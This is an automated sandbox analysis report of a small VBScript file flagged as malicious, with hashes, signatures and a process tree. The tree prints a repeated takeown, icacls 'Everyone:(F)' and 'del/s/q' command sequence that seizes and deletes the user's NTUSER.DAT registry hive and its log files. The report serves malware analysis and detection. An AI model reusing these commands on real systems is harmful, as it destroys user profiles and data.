Overview

overview

8

Static

static

1

file.vbs

windows7-x64

8

file.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    141s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/09/2024, 13:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.vbs

  • Size

    506B

  • MD5

    0c7e1be66d051894037fbd4d3ba7e873

  • SHA1

    f42da981a96a415fcfe54b03369c024579ca91e6

  • SHA256

    8376d1d8d0eacb7462cdf9c4548e5e700999ec3112355dcb48041a1b636179e6

  • SHA512

    92e15380deffd98351b16962b23b41492c528f02f9993198c4010c3ed1d50a6c7cbab38aa621c2f04eaf96a7431d01eb8ef1299f59ccfae15aac4dfa72c1ce74

Score
8/10
defense_evasiondiscoveryexploitspywarestealer

Malware Config

Signatures

  • Possible privilege escalation attempt 14 IoCs
    exploit
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 14 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4496
    • C:\Windows\System32\takeown.exe
      "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:3940
    • C:\Windows\System32\icacls.exe
      "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT /grant Everyone:(F)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:416
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT
      2⤵
        PID:2936
      • C:\Windows\System32\takeown.exe
        "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG1
        2⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2780
      • C:\Windows\System32\icacls.exe
        "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG1 /grant Everyone:(F)
        2⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2916
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG1
        2⤵
          PID:1348
        • C:\Windows\System32\takeown.exe
          "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.dat.LOG2
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1436
        • C:\Windows\System32\icacls.exe
          "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.dat.LOG2 /grant Everyone:(F)
          2⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2284
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.dat.LOG2
          2⤵
            PID:1596
          • C:\Windows\System32\takeown.exe
            "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:5036
          • C:\Windows\System32\icacls.exe
            "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf /grant Everyone:(F)
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:5068
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf
            2⤵
              PID:4388
            • C:\Windows\System32\takeown.exe
              "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4092
            • C:\Windows\System32\icacls.exe
              "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms /grant Everyone:(F)
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:900
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms
              2⤵
                PID:4032
              • C:\Windows\System32\takeown.exe
                "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
                2⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:3544
              • C:\Windows\System32\icacls.exe
                "C:\Windows\System32\icacls.exe" C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms /grant Everyone:(F)
                2⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:4144
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
                2⤵
                  PID:3240
                • C:\Windows\System32\takeown.exe
                  "C:\Windows\System32\takeown.exe" /f C:\Users\Admin\ntuser.ini
                  2⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:1864
                • C:\Windows\System32\icacls.exe
                  "C:\Windows\System32\icacls.exe" C:\Users\Admin\ntuser.ini /grant Everyone:(F)
                  2⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3940
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c del/s/q C:\Users\Admin\ntuser.ini
                  2⤵
                    PID:416

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads